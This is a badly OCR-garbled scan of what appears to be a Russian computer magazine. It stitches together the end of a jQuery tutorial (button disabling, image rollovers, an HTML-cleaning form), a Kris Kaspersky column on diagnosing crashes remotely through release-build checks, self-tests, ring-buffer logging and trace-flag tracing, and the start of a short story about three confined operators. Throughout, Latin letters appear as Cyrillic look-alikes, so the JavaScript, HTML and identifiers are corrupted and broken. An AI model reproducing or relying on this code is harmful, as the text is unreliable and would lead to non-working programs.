сервер. Очень бы хотелось сделать ее недо- 
ступной после первичного обращения к ней, 
чтобы пользователь не отправлял сообщение 
несколько раз подряд, ведь бывают нервные 
юзеры ;). Чтобы этого добиться, надо изменить 
атрибут б і за Ые б. 

Однако мои эстетические воззрения требуют 
еще и поменять визуальное изображение на- 
жатой кнопки, например изменить фон, границу 
или надпись. Нам необходимо определить в 055 
два класса — епаЫесі и сПзаЫесі. Поумолчанию 
у кнопки будет класс епаЫесі, а после нажатия 
— сІізаЫесІ: 

МЕНЯЕМ КЛАССУ НАЖАТОЙ КНОПКИ 

МѴА5СШРТ 

$ ( " #зиЪтік-ЪиЦЦоп" ) . сііск ( 
ІипскіопО { 

$ (Шз) . аккг 

({сІізаЫесІ : " кгие"}); 

$ ( " #зиЬтіЦ-ЬиДЦоп" ) . 
асІсІСІазз ( "сІізаЫесІ" ) § 

ш 

□ Ролловер 

Середина статьи уже далеко позади, поэтому 
хотелось бы рассмотреть комплексный пример. 

В качестве него мы сделаем полноценный рол- 
ловер. Для самых маленьких читателей поясню, 
что гоііоѵег — это такая красивая кнопочка, кото- 
рую можно нажать. Но нетолько: при наведении 
на нее курсора мышки и нажатии, изображение 
на кнопке меняется (смотри рисунок). 
Договоримся отом, в каких файлаху нас будут 
храниться эти изображения: 

• .і рд - исходное изображение кнопки; 

• _Ьоѵегдрд - кнопка при наведении мышки; 



• _сИскдрд - нажатая кнопка. 

Чтобы внести ясность, приведу конкретный 
пример. Если основной файл называется 
ЬиНопдрд.то вспомогательные будутимено- 
ваться ЬіЖоп_Ноѵег.ірд и ЬіЖоп_сІіскдрд. 
Реализовывать ролловер на НТМЕ будем с 
помощьютэга ввода стипом «изображение»: 

<іприк Цуре=" ішаде" 
згс= "Ъиккоп . дрд" /> 

Теперь проясняется механизм работы самого 
скрипта: нам надо найти всеэлементы іприі 
стипом ітаде и в зависимости от события 
поменять атрибутзгс. Поскольку смена имени 
файла будет происходить при трех событиях, 
вынесем этот функционал в отдельную функцию 
сЬапдеРІІепаппе: 

МЕНЯЕМ ИМЯ ФАЙЛА 

МѴА5СШРТ 

іипскіоп СІіапдеРіІепате ( іприО , 
соипЦ, зиіііх) 

{ 

ѵаг іііепате = $(іприЕ) . 
аЕЕг ( " зге " ) ; 

іііепате = іііепате . зиЪзкг ( 0 , 
іііепате . ІепдЫ-соипк) ; 
іііепате = іііепате + зиіііх + 

" орд" ; 

$ ( іприк ) . аЕОг ( {зге: іііепате} ) ; 

} 

Если присмотреться, то легко заметить, что 
эта функция беретзначение атрибута вге из 
элемента іприі, отрезает от имени файла соипі 
символов и добавляет зиіііх плюс расширение 
«дрд». Фактически она меняет один суффикс 
(конец имени) файла на другой. Теперь осталось 
грамотно применить эту функцию. 

Для выбора нужных элементов будем исполь- 
зовать конструкцию $("іприі[0іуре=іпладе]"), 
которая найдет все инпуты стипом ітаде. При 
наведении курсора мышки на ролловер, нам 
нужно отрезать «дрд» (4 символа) от имени фай- 
ла и добавить «_И оѵе гд р д » . Вернуть все надо, 
когда мышка наддругим элементом. 



МЕНЯЕМ ИЗОБРАЖЕНИЕ ПРИ НАВЕДЕНИИ 
МЫШКИ 

МѴА5СВІРТ 

$ ( " іприД [ @Оуре= ітаде ] " ) . Тюѵег ( 
ТипсДіопО { СІіапдеРіІепате (ДЬ.із , 

4 , "_]гоѵег " ) ; } , ТипсДіоп ( ) { 
СІіапдеРіІепате (Оіііз , 10 , " " ) ; } ) ; 

Написать обработчик нажатия мышки тоже 
труда не составит. В качестве события я выбрал 
тоизебоѵѵп, вместо сііск. Честно говоря, хотел 
показать, что не кликом единым живы ;). От име- 
ни файла надо откромсать «_Ьоѵегдрд» (мышка 
наведена), то есть Юсимволов, и дописать 
«_сІіскд рд»: 

МЕНЯЕМ ИЗОБРАЖЕНИЕ 
ПО КЛИКУ МЫШКОЙ 

МѴА5СКІРТ 

$ ( "іприО [@Дуре= ітаде] " ) . 
тоизес!оѵт( іипсДіопО { 
сЬапдеРіІепате (Оіііз , 10, 

"_с1іск" ) ; } ) ; 

Отмечу, что ролловеру нас получился довольно 
универсальный. Чтобы применить его, надо 
создатьтри файла, которые соответствуют 
состояниям кнопки, и использовать элемент 
іприі с атрибутом ітаде. Неплохо для десятка 
строчек кода ;). 

□ «Вордатор» 

На десерт осталось уже настоящее веб-прило- 
жение — «Вордатор». Оно будет очищать НТМЕ 
отлишнего кода, вставленного визуальными 
редакторами, например ѴѴогсГом. Интерфейсу 
нас будет несложным, поскольку нам требуется 
всеголишьдва поля ввода и переключатели 
опций (смотри рисунок). 

Чтобы создатьтакую форму, проще всего 
воспользоваться таблицами. С этим, я думаю, 
проблем не возникнет. Для описания отде- 
льных элементов надо использовать тради- 
ционныетэги НТМИ: ІаЬеІ, іехіагеа, іприі, 
ЬиНоп. Необходимо обязательно прописать 
идентификаторы элементов, чтобы мы смогли 
обрабатывать события и получать содержимое 
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элементов. Приведу описание нашей формы 
без таблиц разметки: 

ЭЛЕМЕНТЫ ФОРМЫ БЕЗ РАЗМЕТКИ 
НТМІ_ 

<1аЬе1>НТМЬ для очистки 
сДехДагеа і<і="зоигсе" со1з="80" 
готл/з = " 10 " ></Цех1іагеа> 

</1аЬе1> 

<1аЬе1>Теги 

сіприД ій=" ЦадзТоСІеап" 

Оуре= " ОехО " /> 

</1аЬе1> 

< 1 аЬе 1 >Атрибу ты 
сіприО і(і=" аООгзТоСІеап" 

Оуре= " ОехЦ " /> 

</1аЬе1> 

<1аЬе1>Зачищенный НТМЬ 
<ДехДагеа іс!= " гезиШ " со1з="80" 
гоѵ\/з = " 10 " ></ЦехОагеа> 

</1аЬе1> 

<ЬиЦЦоп іс!= " сіеап" >Очистить</ 
Ьи00оп> 

Как видишь, функциональность небольшая, но 
нам достаточная. Мы будем удалять ненужные 
атрибуты и очищать бесполезные пустыетэги. 
Первое действие я подробно распишу, таккак 
на его примере можно посмотреть, как парсить 
НТМбспомощьюіОиегу. 

Прежде всего надо получить текст из поля 
ввода с идентификатором зоигсе. Затем нужно 
получить на его основе объектіОиегу. Я сделал 
это с помощью невидимого контейнера гезсііѵ. 
Оформить это лучше в виде отдельной функции 
деШзегНітК): 



ТЕЛО ФУНКЦИИ ОЕТиБЕКНТМЦ) 

МѴА5СШРТ 

$ ( сІосшпепО . Ьосіу ) . аррепО ( " <сііѵ 
зОу1е=\ "сіізріау : попе\" ісЗ.= \ 
"гезс!іѵ\ ) ; 

ѵаг ТЩтІТоСІеап = 

$ ( " # зоигсе" ) . ѵаі ( ) ; 

$ ( " #гезсИѵ" ) . ІШтІ (ЫсшІТоСІеап) ; 

Для парсинга НТМбмы, разумеется, воспользу- 
емся функцией $(...), но искать объекты нам надо 
не по всему документу, а только в контейнере 
гезсііѵ, поэтому обязательно придется указать 
второй параметру функции $(...) в качестве кон- 
текста поиска. Осталось уточнить, что работать 
созначением элементов форм нужно методом 
ѵаШ, а весь код необходимо поместить в конс- 
трукцию $(боситепі).геабу: 

ТЕЛО ФУНКЦИИ СЕТІІБЕРНТМІД) 

МѴА5СВІРТ 

$ ( " #сіеап" ) . сііск ( ТипсЪіоп ( ) { 

деШзегНЦтІ ( ) ; 

$("*", $ ( " #гез<5іѵ" ) ) . 
еасіі ( ТипсОіоп ( ) { 

аДОгзТоСІеап = ( " #а01ігзТоС1еап" ) . 
ѵаі ( ) . зрііъ ( " " ) 
бог (аДДг іп аООгзТоСІеап) 

{ 

$ ( Ытіз ) . гешоѵеАЦОг ( 
аДЦгзТоСІеап [аОДг] ) ; 

} 

}) ; 



$ ( " #гезиШ " ) . ѵаі ( $ ( " #гезс!іѵ" ) . 

ІіДтІ О)? 
геДигп Іаізе; 

}) ; 

Итак, что же мы натворили нашими про- 
граммистскими руками? Сперва мы пове- 
сили обработчик клика на кнопку «Очис- 
тить». В нем мы вызываем функцию 
деШзегНітІ, которую описали выше. 
Далее мы находим все НТМІ_-элементы в 
контейнере гезсііѵ. Для извлечения строки 
атрибутов из поля ввода аіігзТоСІеап ис- 
пользуем метод ѵаЩ и разбиваем атрибуты 
пробелами. Пробегаясь по всем атрибутам 
из списка, удаляем их. Результат поме- 
щаем в поле ввода гезиіі. И все! Удалять 
стоит атрибуты Іапд, зіуіе и сіазз. Также 
можно посмотреть, какие атрибуты любит 
добавлять твой визуальный редактор. Что 
касается ненужных тэгов, например зрап 
после ѴѴогсГа, то их проще всего удалять 
регулярными выражениями. Это и останется 
тебе на самостоятельную работу, потому что 
кіОиегу имеет мало отношения ;]. 

□ Заканчиваем 

Ух, много дел свершено, мало кода написано, 
лепота! Надеюсь, мнеудалось нетолько объяс- 
нитьосновные принципы работы фреймворка 
ІОиегу, но и показать на конкретных приме- 
рах, как написать приложения. Вторая моя 
надежда связана стобой: попробуй написать 
код из статей (или, в крайнем случае, возьми 
его с диска) и задействуй его у себя на сайте 
или блоге. □□ 



Философское отступление, или мысли программиста вслух 

Последствия применения ІОиегу в качестве фреймворка при разработке веб-приложений на стороне клиента сразу бросаются в глаза. НТМІ_- 
код становится чистым, кристально чистым, как в рекламе стирального порошка :]. Это происходит, из-за отсутствия, во-первых необходимости 
прописывать события внутри НТМІ_-кода, а во-вторых «лишних» классов, которые могутбытьдобавлены динамически. Тем не менее, всегда могут 
пострадать пользователи с отключенным ЭаѵаБсгірС И последнее, что стоит отметить, — это отсутствие НТМДдля декорирования. Ярким примером 
можетбытьсозданиескругленныхуголковуэлементов, когда при обычном подходе используются вложенные контейнеры. 

Следующее, что бросается в глаза, — это уменьшение количества кода. Тут, в первую очередь, играет роль мощный механизм поиска нужныхэлемен- 
тов. И конечноже нельзя забыть об автоматизации множества рутинных действий с помощью фреймворка )0иегу. 
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ПРОГРАММЕРСКИЕ ТРЮКИ 
И ФИЧИ ОТ КРИСА КАСПЕРСКИ 



Сегодняшний выпуск посвящен проблемам удаленной диагностики ошибок. Это 
когда у пользователя падает программа, а воспроизвести ситуацию на месте у нас 
не получается. Удаленную отладку (по модему и/или интернету) не предлагать, 
поскольку далеко не всякий пользователь на это согласится. Все, что нам остает- 
ся, — внедрить в программу дополнительный проверочный код. 
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Никогда не удаляй про- 
верки из геіеазе 



Большинство программистов, напички- 
вающих отладочную версию программы 
всевозможными проверками корректности 
всех значений, словно лемминги, подчи- 
няющихся законам всеобщей традиции, 
удаляют их из финального релиза. Азачем?! 
Отладочную информацию (генерируемую 
компилятором) удалять, естественно, нужно, 
поскольку она нетолько в разы увеличивает 
размер исполняемого файла, но и облегчает 
его взлом, а также в большинстве случа- 
ев вырубает многие опции компиляции. 
Удаление избыточных проверок практически 
не сказывается на размере и слабо влияет 
на производительность (за исключением, 
быть может, многочисленных проверок в 
глубоко вложенных циклах). Такзачем же 
ихудалять?! И каким образом выполнять 
диагностику, если на машине конечного 
пользователя программа внезапно откажет 
в работе?! Если программист предполагал, 
что ошибка может проявиться в отладочной 
версии, и добавил специальную проверку, то 



почему он считает, что она заведомо не поя- 
вится в релизе? Где гарантия, что в процессе 
отладки были протестированы все возмож- 
ные состояния программы? Где гарантия, что 
мы не имеем дело с «наведенной» ошибкой, 
зависящей отдругих частей программы, на 
первый взгляд, не имеющей к ней никакого 
отношения? 

Чем больше проверокостанется в финаль- 
ной версии, тем легче будет найти источник 
ошибки при ее возникновении. Конечно, 
проверка проверке рознь. Одно дело про- 
верить указатель на ноль, и совсем другое 
— корректностьформатированной строки 
данных. В этом случае (если программист 
озабочен производительностью) можно 
ввести специальный флагили ключ команд- 
ной строки, включающий всетяжеловесные 
проверки. 



Активно используй 
самодиагностику 



Самотестирование — великая вещь, и все 
сложные электронные устройства (в том 
числе и процессоры) обязательно включают 



компоненты, выполняющие самодиагнос- 
тику. Тот же самый подход может (и должен) 
применяться в программном коде. Каждая 
мало-мальски сложная процедура должна 
поддерживать функцию самотестирования 
— подавать на свой вход контрольный набор 
данных (жестко прописанный в файле) и 
сравнивать полученный результате этало- 
ном (тоже хранящимся в файле). Обычно 
таких наборов бывает несколько (один не 
обеспечивает полного покрытия всех ветвей 
процедуры). 

На стадии отладки польза самодиагностики 
очевидна, но вот зачем она в финальной 
версии?! Азатем, что мы не можем доверять 
ни аппаратуре, ни системным библиотекам, 
ни самой оси.установленнойу пользова- 
теля. Личный пример из жизни: машинные 
команды РІІ5Н гед 1 6 в 32-битном режиме 
у Іпіеі и АМБ реализованы неодинаково. 

Обе они забрасывают на вершину стека 
двойное слово (как и положено по специфи- 
кации), но одна очищает старшие разряды, а 
другая оставляет их без изменений (со всем 
мусором, что в них есть). В моей программе 
была досадная ошибка, при определенных 
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обстоятельствах приводящая к потере нуля 
в конце АЗСІІЕ-строки. Но поскольку за ней 
следовало двойное слово, заброшенное на 
стек командой РІІ5Н гедіб, и я отлаживал 
программу на процессоре, очищающем 
старший разряд, то все работало более или 
менее нормально (2 байта мусора, появляю- 
щихся в конце строки, никому не мешали). Но 
вот при запуске на другом процессоре, где 
завершающего нуля не оказывалось, возни- 
кала критическая ситуация, завершающаяся 
исключением. 

Или вот: незначительные различия в реали- 
зации «плавающих» команд на различных 
процессорах могут привести кстранному 
поведению программы, которое будет 
невозможно воспроизвести на любом другом 
процессоре! 

Про разгон, дефекты памяти ит.д. я вообще 
молчу! Никогда нельзя бытьуверенным в 
том, что после выполнения «а=6; а=а+3;» 
в переменной а окажется именно 9, а не 
83737382. И виноваттут можетбыть не 
только процессор, но и «удар по памяти», 
когда совершенно посторонняя функция, 
обратившись по неинициализированному 
указателю, запишет что-то в чужую область 
данных. 

Естественно, самотестирование занимает 
некоторое время, и для достижения макси- 
мальной производительности я использую 
его втом случае, если предыдущий запуск 
программы завершился ваварийном режи- 
ме. Крометого, на всякий непредвиденный 
случай присутствует недокументированный 
флаг, форсирующий самотестирование, даже 
если предыдущий запускбыл завершен 
нормально. 

Функции самотестирования не раз выручали 
меня и помогли мне сэкономить колоссаль- 
ное количество времени, поскольку ряд оши- 
бок был связан с особенностями конкретного 
оборудования, то есть причина крылась вне 
исходного кода программы. 
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отладочной печати 



Отладочная печать — великолепное изобре- 
тение, появившееся еще вте времена, когда 
интерактивных отладчиков не существо- 
вало и в помине, а отлаживать было надо. 
Большинство программистов использует 
тривиальную запись в текстовый Іод-файл 



или АРІ -функцию ОіЛриШеЬидЗігіпд. Пер- 
вый метод, естественно, лучше, поскольку он 
нетребует наличия отладчика или специ- 
альной утилиты для перехвата отладочной 
печати, которую конечному пользователю 
нужно устанавливать на свой компьютер. Мы 
же ведь не собираемся исключать отладоч- 
ную печать из финальной версии, верно? 
Естественно, не собираемся! Достаточно до- 
бавить специальный ключ командой строки, 
секретную комбинацию клавиш или вполне 
честную опцию в настройках программы. 
Логлучше всего вести втекстовой форме. 

Так пользователю будет проще пересылать 
его нам по почте и он сможетубедиться, что 
там нет ничего такого, чего бы он не хотел 
разглашать. 

Воттолько... при возникновении крити- 
ческой ошибки система завершает работу 
приложения еще до того, как будут сброшены 
дисковые буферы. Даже использование фун- 
кции ЛІизН ничего не решает (а вотскорость 
программы замедляет весьма существенно). 
Какже быть?! Да очень просто: создать в 
збагесі-ппеппогу кольцевой буфер заданного 
размера и весь отладочный вывод направ- 
лять туда, читая его с помощью дочернего 
процесса. Тогда, при аварийном завершении 
материнского процесса, збагесі-ппеппогу не 
будет освобождена системой и дочерний 
процессуспеет принять последнее отла- 
дочное сообщение, отправленноеупавшей 
программой. Ктомуже этот метод работает 
намного быстрее прямой записи на диск. 

А почему буфер должен быть именно коль- 
цевым?! В общем, это нетребование, атак, 
простое пожелание. Обычно нас интере- 
сует не весь отладочный вывод целиком, а 
события, непосредственно предшествующие 
падению. Но при интенсивном отладочном 
выводе полный размер лога может достигать 
десятков мегабайт, большая часть которых 
не несетникакой полезной нагрузки, так что 
лучшезаранее исключить ее, замкнув буфер 
в кольцо. 



Автоматический трасси- 
ровщик— это просто 



В самых ответственных случаях програм- 
му, поставляемую заказчику, имеетсмысл 
снабдить простейшим автоматическим 
трассировщиком, на создание которого уйдет 
не больше одного вечера. Просто взводим 



флагтрассировки (ТЕ) и отлавливаем 
отладочные исключения штатными средс- 
твами операционной системы (через 5ЕН), 
записывая: а) адрес машинной команды; 
б) содержимое регистров; в) адрес ячейки 
памяти, к которой она обращается. 

Когда трассировка из прикладного уровня 
дойдет до ядра, процессор самостоятель- 
но опустит флагтрассировки на время 
прохождения нулевого кольца и потом 
подниметего при возвращении на при- 
кладной уровень, так что предусматривать 
специальную обработку для исключения 
системных вызов из списка трассируемых 
функций не надо. 

Естественно, трассировка на несколько 
порядков (!) замедляет скорость работы 
программы и потому должна включаться 
специальной комбинацией клавиш, кото- 
рую пользователь нажимает в тот момент, 
когда программа приближается к месту 
сбоя на максимально близкое расстоя- 
ние. А для этого пользователю придется 
воспроизвести ситуацию, при которой 
возникаетошибка. Еслиже ему это сделать 
неудастся, чтож! Включаемтрассиров- 
щик при старте программы специальным 
ключом командой строки и пишет результат 
трассировки в кольцевой буфер, который 
внимательно изучаем. 

Располагая информацией о ходе 
выполнения программы, содержимом 
регистров и ячеек памяти, мы сможем 
поймать любую ошибку, какой бы за- 
ковыристой она ни была, ведь факти- 
чески мы отлаживаем программу на 
клиентской стороне в неинтерактивном 
режиме. При желании (если жаба душит) 
трассировщик можно реализовать в 
виде отдельной динамической библи- 
отеки, высылаемой клиенту только при 
возникновении серьезных проблем. То 
же самое, кстати, относится к функциям 
самодиагностики. 

Понятное дело, программа, защищенная 
протекторами, содержащими антиотладоч- 
ные приемы, с автоматическим трассиров- 
щиком работать не будет. Та к что придется 
отказаться или от протекторов, или от 
трассировки, либо же надо писать «умный» 
трассировщик, обходящий антиотладоч- 
ные приемы, ноэтоуже серьезная задача, 
решение которой может затянуться не на 
одну неделю. □С 
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Святая 

троица 



— «РАМДАК», — хихикнул в микрофон Лаврик. 

— «Компьютер», — ответил Клим. — Но это 
© глупо. Сейчас Макс зациклит. А мы не 

договаривались... 

— «РАМДАК», — подтвердил Макс. — А ведь 
надо было обсудить сразу. Петли не создавать 

— и все, сейчас бы без разговоров обошлись. 
Лаврик вздохнул и спросил: 

— Аты другого слова на «эр» не знаешь? 

— Почемуже, знаю... Хотя, если задуматься... 
Вот если бы двое играли и случилась бы петля, 
то тогда каждый игрок говорил бы одно и то 
же слово. А нас трое. И Лаврик сейчас скажет 
«компьютер», если он дурак, конечно... 

— Сам ты дурак, — как-то вяло возмутился тот в 
ответ. — Думаешь, петли не получится? Ладно... 
Апо-английски можно? 

— Можно, — за всех ответил Клим. 

— Тогда «кернел». 

— «Лэптоп», — из всей троицы Клим казался 
наиболее равнодушным к происходящему. 

— «Плагэнд плей», — сказал Макс и засмеялся. 
— Ой как смешно, — буркнул Лаврик. — Ясен 
перец, что на «и краткое» не получится. 

— Не туп и, это же инглиш, — шмыгнул носом 
вечно простуженный Клим. — Думай быстрей. 

— «Яндекс», — спустя полминуты ответил 
Лаврик. — Ну типа «игрек» — первая буква... 

— Нутипа мы поняли, — Макс намеривался 
пройтись по интеллектуальным способностям 

і 

і Лаврика, но что-то его остановило. — Сейчас 

і Клим насудивит. 

г — Удивлю, — ответил тот. — «Стэнд бай». 

— Это два слова, — возмутился Макс. 

— А«плагэнд плей»? 

— Согласен, — Максу пришлось сменить гнев 
на милость. 

— Издеваетесь, что ли? — обиженно спросил 
Лаврик. 

— Аты чего переживаешь? Сейчас очередь 
Макса, —удивился Клим. — И я дажезнаю, что 
он сейчас скажет. 

г 

— Откуда? 

— По аналогии... 

— «Яху», — произнес Макс, и Клим сухо откаш- 
лялся. — Неужели угадал? 

— Угадал, угадал. Ты всегда стереотипно мыс- 
лил. Раз был «Яндекс», значит, будет и «Яху». 



Клим был прав, как всегда. В ихтроице он был 
«аксакалом» — Лаврик во время одной приват- 
ной беседы с Максом сказал: «Этот старикан ра- 
ботает столько, сколько я живу...» И это при том, 
что Клим был старше всего лишь на шесть лет. 

— Внесу уточнение? — спросил Лаврик. — Да- 
вайте рассматривать чтение слов натом языке, 
на каком нам удобнее подобрать ответ. 

— Согласен, — ответил Клим. Макс немного 
помолчал и тоже принял уточнение. 

— Тогда «юникод», — удовлетворенно произнес 
Лаврик. — Сколько еще ждать? 

— Ответа? — спросил Клим. — И ждатьтут нече- 
го — «дисконнект». 

— Какого, нафиг, ответа? Работы! Может, лучше 
сразу «дизэйбл»? И вообще, мы тут щеголяем 



отвлекаемся. 

— Да уж, — вздохнул Макс. — Честно говоря, 
если вспомнить, что мы занимаемся этой ерун- 
дой уже полтора часа, а перед этим гоняли ботов 
еще минутсорок... 

— Расслабились, что ли? — удивленно спросил 
Лаврик. — Намекаешь на отсутствие дисципли- 
ны в группе? 

— Чего намекать-то?Ты когда последний раз 
смотрел на экран? 

— Несколько минут назад, — Лаврик засопел 

— похоже, надулся как мышь на крупу. 

— Врешь, — неожиданно прозвучал голос 
Клима. — По себе знаю, минимум полчаса все по 
барабану. Мы все люди. Отвлекаемся. 

— И ты? — недоверчиво спросил Макс. 



«САМ КЛИМ НЕ РАСПРОСТРАНЯЛСЯ ПО 
ПОВОДУ СНИМКА, НО ВСЕ ПОНИМАЛИ, 
ЧТО ЕГО СВЯЗЫВАЕТ С ЭТОЙ ДЕВУШКОЙ 
ЧТО-ТО ОЧЕНЬ СЕРЬЕЗНОЕ» 



знанием английского или вспоминаем специ- 
фическиетермины?! 

— Поработать еще успеем, — Макс и Лаврик 
почувствовали, что где-то там, в невидимом с 
ихточек месте, Клим кивнул головой и погладил 
угол ноутбука — тот, где была наклеена фотогра- 
фия девушки, которую никто никогда не видел. 
Сам Клим не распространялся по поводу сним- 
ка, но все понимали, что его связываетсэтой 
девушкой что-то очень серьезное. — И никакого 
«дизэйбла» — все в силе. 

— «Текстуризатор» подойдет? — попытался 
разрядить ситуацию Макс, который понял, 
что сейчастему работы лучше не развивать. 

— Длинно, но под условия задачи подходит. 

— Лучше бы мыв города играли, — угрюмо от- 
реагировал Лаврик. — Тогда бы я сейчассказал 
«Рязань», и мы бы поржали над Климом... 

— Сомневаюсь, — отозвался Клим. — Полу- 
чили бы «Нью-Йорк» в ответ. Мне кажется, мы 



— И я, — подтвердил Клим. — Ноя —это другое дело... 

— Еще бы, — машинально произнес Лаврик и 
тутже пожалел об этом. Но слов для нейтрализа- 
ции своего ляпа он не нашел. 

— Я всегда предполагал, что ваше мнение 
насчет моей персоны не соответствует действи- 
тельности, — Клим усмехнулся и постучал ногтем 
по микрофону — Макс и Лаврик поморщились 
от этого неприятного звука. — Неужели дело в 
возрасте? Ведь по статусу мы равны, здесь нет 
начальников и подчиненных. Да, временами 

я делаю то, что называется «вставить пистон», 
но согласитесь, у вас еще детство из мозгов не 
выветрилось... 

Все молчали, обдумывая слова Клима. 
Тишина в наушниках сопровождалась каки- 
ми-то потрескиваниям, шорохами, и Лаврик 
в нарушение всех инструкций вытащил 
«каплю» из уха, осмотрел со всех сторон, 
сковырнул кусочекушной серы и брезгливо 
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растер в кармане. Вставил на место — пос- 
торонних шумов меньше не стало. 

— Играть дальше будем? — спросил Макс. 

— В слова? — уточнил Клим. — Честно говоря, 
надоело. 

— Играть — надоело, спать — нельзя, — начал 
былоЛаврик, но Клим кашлянул, итирадатут 
же прекратилась. — Да я так, пар выпустить... 

— Клим, а кто все это придумал? — вдругспро- 
сил Макс. Вопроса не ожидал никто, даже сам 
Макс не понимал, как вдруг решился спроситьо 
том, о чем тайком думали все. — Чья это идея? 

— Онотебе надо? — выдержав паузу, поинте- 
ресовался тот в ответ. — Сидим вот, каждый в 
своем... гнезде. Ждем команды. 

— А чьей команды? — Макс, похоже, решил 
выжать из ситуации все, что удастся. — Кто нас 
сюда сажает? 

— Ты сейчас разговариваешь со мной как 
с равным или все-таки разделяешь мнение 
Лаврика? — Клим спрашивал оченьосто- 
рожно, чувствуя, что Макс готов зайти в своих 
расспросах очень далеко. — Если как с равным, 
то должен знать, что мы все информированы 
одинаково. Если предполагаешь, что моя роль 
направляющая и руководящая, то почемуты ду- 
маешь, чтоя поделюсьстобой информацией? 
Макс пожал плечами, нотутже понял, что этот 
жест никто неувидел. Он зажмурился на не- 
сколько секунд, встряхнул головой и сказал: 

— Глупо верить вто, что мы все одинаковые. У 
нас, можетбыть, одинаковые ноутбуки. Даже, 
наверное, мы одинаково одеты сейчас — вот, 
например, на мне... 

— Заткнись! — гаркнул Клим. — Не нарушай 
инструкции, придурок! Нас пишут — каждое 
слово, каждый жест! Нет, ну какой же идиот! 
Макс заткнулся на полуслове. Лаврик молчал. 
Клим тоже — взорвался и мгновенно утих, как 
порыв ветра. Наступила гробовая тишина, даже 
артефакты в наушниках куда-то подевались. 
Каждый из них думал сейчас отом, что они 
здесьделают — заложники этих, как выразил- 
ся Клим, «гнезд», ноутбуков, чужих команд... 
Макс вдруг вспомнил, что в последний раз он 
нажимал « Епіег», когда по условию задания 

на экране появилось изображение дьяволен- 
ка — эмблемы операционной системы В50. 
Почемудьяволенок, что все это значило, никто 
объяснить не мог. Они точнотакже сидели 
почти три часа, разговаривали ни о чем, играли 
во всякую сетевую ерунду, к которой только 
был доступ. Не поднимать сегодняшнюютему 
хватало ума у всех. 

Потом появился дьяволенок, Макс клацнул 
клавишей и услышал в наушниках что-то вроде: 
«Всем спасибо, все свободны...» 

— Чего-тоу меня сегодня голова болит... 

— нарушил тиш и ну Л а ври к. — Наверное, будет 
дождь. 

— Ты когда последний раз видел дождь? 

— вздохнул Макс. 

— Опять?! — Клим струдом сдерживал себя, 
чтобы не накричать на своих напарников. 



— Да что опять?! — взвился Лаврик. — Подума- 
ешь — дождь! Да, мы уже сто лет не видели ни 
дождя, ни снега, ни солнечного света! Да, мы в 
гнездах, черт побери! 

— Высиживаем свои яйца... —тихо добавил 
Макс, но Клим его услышал. 

— Будете много рассуждать — вам их отрежут, 

— коротко и чертовски зло ответил он сразу двум 
бунтарям, нарушающим инструкции. — И очень 
можетбыть, что кое-кто поменяется с нами 
местами... 

«Он что-то знает», — не сговариваясь, подумали 
Лаврик и Макс. Иначе какобъяснить, откуда у 
Клима такая осведомленность о наказаниях? 
Похоже, Клим и сам понял, что переборщил с 
угрозами. Понял и замолчал. 

— Какой у нас, однако, конструктивный раз- 
говор, — усмехнулся Лаврик. — Мне кажется, 
имеетсмысл сделать вид, что ничего не было, и 
продолжить брошенную игру. Последнее слово 
было, если я правильно помню, «текстуриза- 
тор»... 

— «Рандомайзер», — машинально ответил 
Макс. — Надоело. Скорей бы команду дали. Ин- 
тересно, а что на этот раз надо будет углядеть? 
Может, ангелочка, против того чертенка, что был 
три недели назад? 

— Можетбыть, — согласился Лаврик. — Ятоже 
устал здесьторчать. 

— Интересно, мы далеко друг от друга? — вдруг 
спросил Клим. — Только не надо поддержи- 
вать этот разговор. «Я спросил у тополя...» Без 
комментариев. 

— Понятно, — согласился Макс. — Утополя, у 
ясеня... И что? 

— Ничего, — отмахнулся Клим. — «Была тебе 
любимая, а стала мнежена». Пусть потом голову 
поломают, что мы имели в виду. 

И он неожиданнозасмеялся. Громко, во весь 
голос. Он хохотал так, что сначала Лаврик, а сле- 
дом за ним и Макс неудержались и присоеди- 
нились кэтому приступу смеха. Они смеялись 
над бредом Клима как над самым смешным 
анекдотом в мире, смеялисьтак, что выступили 
слезы. 

Смехоборвалсятакже внезапно, каки начался. 
Лаврик, вечно шмыгающий носом, струдом 
пытался раздышаться; Макс по-старчески 
откашлялся и хмыкнул еще пару раз вдогон. 
Климжеоченьзаразительнозевнул и спросил: 

— Лаврик, утебя когда день рождения? 

— Ноутбук свой хочешь подарить? — недовер- 
чиво спросил тот, неторопясьотвечать. — Через 
два месяца. Почти. 

— Считаешь, что мой лучше твоего? — Клим 
зевнул еще раз. — Черт побери, что они в сок 
добавляют? Наверное, травят нас бромом... 

— Конечно, лучше, — ответил Лаврик. — Ты 
ж сам как-то хвастался, что какой-то сложный 
пароль быстро подобрал... 

— Бромом невыгодно, — вмешался Макс. 

— Ведьу нас скорость реакции не последнее 
дело. Ата к ста нем тормоза ми, как же работу 
делать? 



— Ты прав, — согласился Клим. — Тогда чего же 
спать такхочется? 

— Небось, легпоздно, — предположил Лаврик. 

— Всеза компьютером, за компьютером... Тыж 
программист, нето что мы... Сидел до утра, изоб- 
ретал, правил, снова изобретал... Воттолько 
зачем? Комутутэто может понадобиться? Мы 
ведь как в золотой клетке — сидим каждый за 
своей дверью, клацаем пальчиками по кнопкам, 
о событиях в миреузнаем из телевизоров... Вот 
кормят хорошо — это факт. А насчет сока — это, 
конечноже, врядли. Салаты, мясо, кофе, кстати, 
наверное, дорогой кофе. Я его мало раньше 
пил, но даже при отсутствии опыта могуточно 
сказать, что денег на нас не жалеют. 

— А насчет денег разговор особый, — подхва- 
тил Макс. — Я всегда хотел понять, какого хрена 
нам отваливаюттакие деньжищи за тотбред, 
что мы делаем? 

— Ты считаешьэто бредом? — спросил Клим. 

— Атогда, когда тебе приносяттвою карточку и 
показывают, насколько больше сталотам денег 
послетого, какты щелкнул кнопкой, отметив 
очередного чертенка? 

— Клим, пришла пора задуматься, — ответил 
Макс. Прозвучало это как-то туманно, но в це- 
лом направленностьего мыслей была понятна 
безо всякихуточнений. — Задуматься над тем, 
не стоит ли закончить весь этот бред... 

— Он прав, Клим. 

Лаврик почувствовал, что разговор переходит 
в какую-то опасную плоскость, но воодушев- 
ленныйтем, что Клим не обрываетего, решил 
тоже вступить в этот диалог с позиций человека, 
который хочет раскрыть тайну. 

— Он прав, — повторил он, чтобы убедиться, что 
Клим больше небудеторать. — Мы попали сюда 
два с половиной года назад, подписав какие-то 
безумные, глупые контракты... Я загремел в этот 
проект потому, что попался на взломе. У меня не 
было выхода —ущерб отмоего проникновения 
составил больше пятидесяти тысяч долларов, ни- 
когда бы не расплатился. Атут предложили и долг 
списать, и еще добавить на карманные расходы... 

